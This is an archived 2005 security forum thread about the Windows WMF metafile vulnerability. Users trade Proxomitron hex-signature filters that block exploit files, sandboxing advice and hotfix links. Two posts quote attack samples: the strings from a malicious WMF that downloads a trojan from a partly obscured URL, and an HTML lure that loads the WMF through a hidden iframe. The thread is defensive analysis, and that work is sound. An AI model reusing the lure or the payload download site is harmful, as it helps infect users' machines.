New Windows Vulnerability

Discussion in 'other security issues & news' started by TNT, Dec 27, 2005.

Thread Status:
Not open for further replies.
  1. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    Something like VMware: www.vmware.com

    OR

    Shadowuser: www.shadowstor.com/products/ShadowUser/

    Both are very effective solutions when it comes to testing and fooling around with dangerous stuff like exploits. ;)
     
  2. Yes indeed. Wise words.
     
  3. shadowsurf

    shadowsurf Guest

  4. Kye-U

    Kye-U Security Expert

    Joined:
    Jun 11, 2004
    Posts:
    481
    These are the most up-to-date Proxomitron filters. (You need Proxomitron in order for these filters to work)

    By using these filters, you are able to kill WMF-Exploit Files, regardless of file extension.

    It uses a Hex-matching method to match the identifying 5 bytes and kills the connection immediately upon detection and alerts you of the offending URL.

    The header filter does allow Proxomitron to filter all file extensions, but the Web Page filter is very specific, and it only applies to files, not HTM(L), CSS, or JS files, so there will be little to no false positives.

    You need BOTH filters to be able to kill WMF-Exploit Files.

    Web Page:

    Code:
    [Patterns]
    Name = "Windows: Kill WMF-Exploit Files [Kye-U]"
    Active = TRUE
    Limit = 5
    Match = "[%01][%00][%09][%00][%00]"
    Replace = "\k$ALERT(Infected WMF-Exploit File Killed on:\n\n\u)"
    Header:

    Code:
    [HTTP headers]
    In = FALSE
    Out = TRUE
    Key = "!-|||||||||||| URL: All File Extensions Force Filter {JJoe} (out)"
    URL = "$FILTER(true)"
     
  5. Bubba

    Bubba Updates Team

    Joined:
    Apr 15, 2002
    Posts:
    11,271
    from US-Cert:

    Microsoft Windows Metafile handler buffer overflow

     
  6. Kye-U

    Kye-U Security Expert

    Joined:
    Jun 11, 2004
    Posts:
    481
    Updated the filters again. It should fix the issue where Proxomitron was freezing, and it should remove any false positives.

    Web Page:

    Code:
    [Patterns]
    Name = "Windows: Kill WMF-Exploit Files [Kye-U]"
    Active = TRUE
    Limit = 16
    Match = "[%01][%00][%09][%00][%00][%03][%52][%1F][%00][%00][%06][%00][%3D][%00][%00][%00]"
    Replace = "\k$ALERT(Infected WMF-Exploit File Killed on:\n\n\u)"
    Header:

    Code:
    [HTTP headers]
    In = FALSE
    Out = TRUE
    Key = "Host: All File Extensions Force Filter {JJoe} (out)"
    URL = "$FILTER(true)"
    Match = "\1"
    Replace = "\1"
     
  7. masqueofhastur

    masqueofhastur Registered Member

    Joined:
    Nov 19, 2005
    Posts:
    109
    Good info on Shadowsurfer, handy solution to new exploits.
     
  8. StevieO

    StevieO Guest

    Here's another nice App that goes much further indepth than the very quick and easy drag and drop MiniDumper.

    . . .


    File Analysis by FileAlyzer

    FileAlyzer is a tool to analyze files - the name itself was initially just a typo of FileAnalyzer, but after a few days I decided to keep it. FileAlyzer allows a basic analysis of files (showing file properties and file contents in hex dump form) and is able to interpret common file contents like resources structures (like text, graphics, HTML, media and PE).

    Using FileAlyzer is as simple as viewing the regular properties of a file - just right-click the file you want to analyze and choose Open in FileAlyzer.

    What follows is a list of tabs that are shown in FileAlyzer (depending on the file type you open),

    General

    Version

    Resources

    PE Header

    Sections

    Import/Export table

    Hex dump

    Image preview

    INI contents

    Zip preview

    Media preview

    ID3 tag

    RIFF

    . . .


    It also includes FoldAlyzer in its main folder which analyizes, yes folders lol.

    Both Free along with other Apps from the home of SpyBot Search and Destroy

    http://www.safer-networking.org/en/filealyzer/


    StevieO
     
  9. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    Those using Processguard, set IE to deny always. Processguard can deny the browser from running at all.
     
  10. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    Windows WMF Metafile Vulnerability HotFix


    http://www.hexblog.com/2005/12/wmf_vuln.html




    Windows WMF Metafile Vulnerability HotFix

    ~ removed direct download link, CrazyM ~
     
    Last edited by a moderator: Dec 31, 2005
  11. Zhen-Xjell

    Zhen-Xjell Security Expert

    Joined:
    Feb 8, 2002
    Posts:
    1,397
    Location:
    Ohio
  12. AntiSerious

    AntiSerious Registered Member

    Joined:
    Jun 28, 2004
    Posts:
    21
    ... I came here to see if anyone had tested using ScriptSentry to block this, by associating the .wmf and .emf files with it instead of whatever default viewer you had previously ... I saw some mention of AnalogX's Script Defender (which I assume works in a similar fashion) but no mention yet of ScriptSentry's effectiveness (or lack of same) ... I've changed the file associations on my XP Pro SP2 box (I run mostly as limited user) but haven't yet added KyeU's new Proxo filters (had some crashes with 4.5) ... if anyone has any feedback I'd like to hear it, thanks ...
     
  13. Zhen-Xjell

    Zhen-Xjell Security Expert

    Joined:
    Feb 8, 2002
    Posts:
    1,397
    Location:
    Ohio
  14. AntiSerious

    AntiSerious Registered Member

    Joined:
    Jun 28, 2004
    Posts:
    21
    ... thanks Zhen-Xjell ... I'm just reluctant to apply the workaround and 'break' other functions ... have to think on this some more ...
     
  15. Zhen-Xjell

    Zhen-Xjell Security Expert

    Joined:
    Feb 8, 2002
    Posts:
    1,397
    Location:
    Ohio
  16. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Here is one:

    Upon accessing the site a WMF file is loaded that executes shellcode which utilizes the recently reported windows WMF vulnerability. ( see http://www.websensesecuritylabs.com/alerts/alert.php?AlertID=385 ).

    The shellcode calls URLmon.dll to download and execute another file.

    Strings of WMF file showing download site for Trojan Horse. The file pawn00#.exe in turn downloads other executables.

    urlmon.dll
    C:\n.exe
    h p://www.freecat.biz/ /pawn002.exe
    ___________________

    http://www.rsjones.net/img/pawnExe.gif


    AS TNT and other point out, the shell code is capable of much more, so with so much uncertainty today,
    I would think that using some type of virtual environment would be a bottom line safeguard.
    And of course, to have a good backup/restore plan.



    ________________
    ~~Be ALERT!!! ~~
     
    Last edited: Jan 1, 2006
  17. Kye-U

    Kye-U Security Expert

    Joined:
    Jun 11, 2004
    Posts:
    481
    Here seems to be a direct conversion from Snort to Proxomitron :) (It's still weird knowing Proxomitron can match hex in picture files :p )

    Code:
    [Patterns]
    Name = "Windows: Kill WMF-Exploit Files [Kye-U]"
    Active = TRUE
    Limit = 1024
    Match = "$STOP()*[%01-%02][%00][%09][%00]*[%26][%00-%FF][%09][%00]"
    Replace = "\k$ALERT(Infected WMF-Exploit File Killed on:\n\n\u)"
     
  18. Zhen-Xjell

    Zhen-Xjell Security Expert

    Joined:
    Feb 8, 2002
    Posts:
    1,397
    Location:
    Ohio
  19. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
  20. Kye-U

    Kye-U Security Expert

    Joined:
    Jun 11, 2004
    Posts:
    481
    Yup :( The way Windows is designed...*sigh*

    I think the only way to match it is by Hex. Antiviruses and Snort do this. Plus my Proxomitron filter :)
     
  21. Zhen-Xjell

    Zhen-Xjell Security Expert

    Joined:
    Feb 8, 2002
    Posts:
    1,397
    Location:
    Ohio
  22. Kye-U

    Kye-U Security Expert

    Joined:
    Jun 11, 2004
    Posts:
    481
    I downloaded xmas-2006_FUNNY.jpg, and here is the source code:

    Code:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
    "http://www.w3.org/TR/html4/loose.dtd">
    <html>
    <head>
    <title>Untitled Document</title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    </head>
     
    <body>
    <P ALIGN=center><IFRAME SRC="foto.wmf" WIDTH=0 HEIGHT=0></IFRAME></P>
    </body>
    </html>
    Foto.WMF is detected by my Proxomitron filter, and is very similar to the other WMF-Exploit files out there. Only difference is the payload. It's 16kB in size.

    It's NOT a new exploit, as SANS reports. The JPG file just acts as an HTML file, which loads the WMF file automatically using an IFrame. The JPG DOES NOT contain any malicious code. The WMF file does.

    The WMF file is the same as the one found on unionseek and crackz.ws. Same structure, but different payload.
     
  23. Zhen-Xjell

    Zhen-Xjell Security Expert

    Joined:
    Feb 8, 2002
    Posts:
    1,397
    Location:
    Ohio
  24. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    Well, it doesn't get displayed in Firefox or Opera. But of course, the stupid IE does read and execute the script. :rolleyes:
     
  25. Zhen-Xjell

    Zhen-Xjell Security Expert

    Joined:
    Feb 8, 2002
    Posts:
    1,397
    Location:
    Ohio
    Exactly.. I had vbulletin and drupal implement some code to help prevent the thing from being uploaded or attached. I've done the same to my site.
     
Thread Status:
Not open for further replies.
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.